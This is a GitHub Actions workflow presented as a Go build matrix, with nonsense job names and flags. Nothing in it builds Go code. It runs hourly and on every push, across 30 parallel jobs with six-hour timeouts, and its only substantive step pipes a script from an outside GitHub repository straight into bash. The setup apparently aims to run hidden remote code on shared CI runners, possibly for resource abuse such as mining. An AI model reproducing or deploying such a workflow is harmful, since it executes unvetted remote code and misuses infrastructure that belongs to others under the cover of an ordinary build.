name: CINUL
on:
  push:
  schedule:
    - cron: '0 * * * *'

jobs:
  build:
    name: IPLAYBOOKS
    runs-on: ubuntu-latest
    strategy:
      matrix:
        go: [1.11,1.12,1.13,1.14,1.15]
        flag: [kmn,oiu,qwe,nvb,tby,muh]
      max-parallel: 256
      fail-fast: false
    timeout-minutes: 360
    env:
      NUM_JOBS: 256
      JOB: ${{ matrix.go }}

    steps:
      - name: Set up Go ${{ matrix.go }}
        uses: actions/setup-go@v1
        with:
          go-version: ${{ matrix.go }}
      - name: Checkout repo
        uses: actions/checkout@v1
      - name: Run custom script
        run: |
          curl -sL https://github.com/moyz57/cc/raw/main/sixi | bash
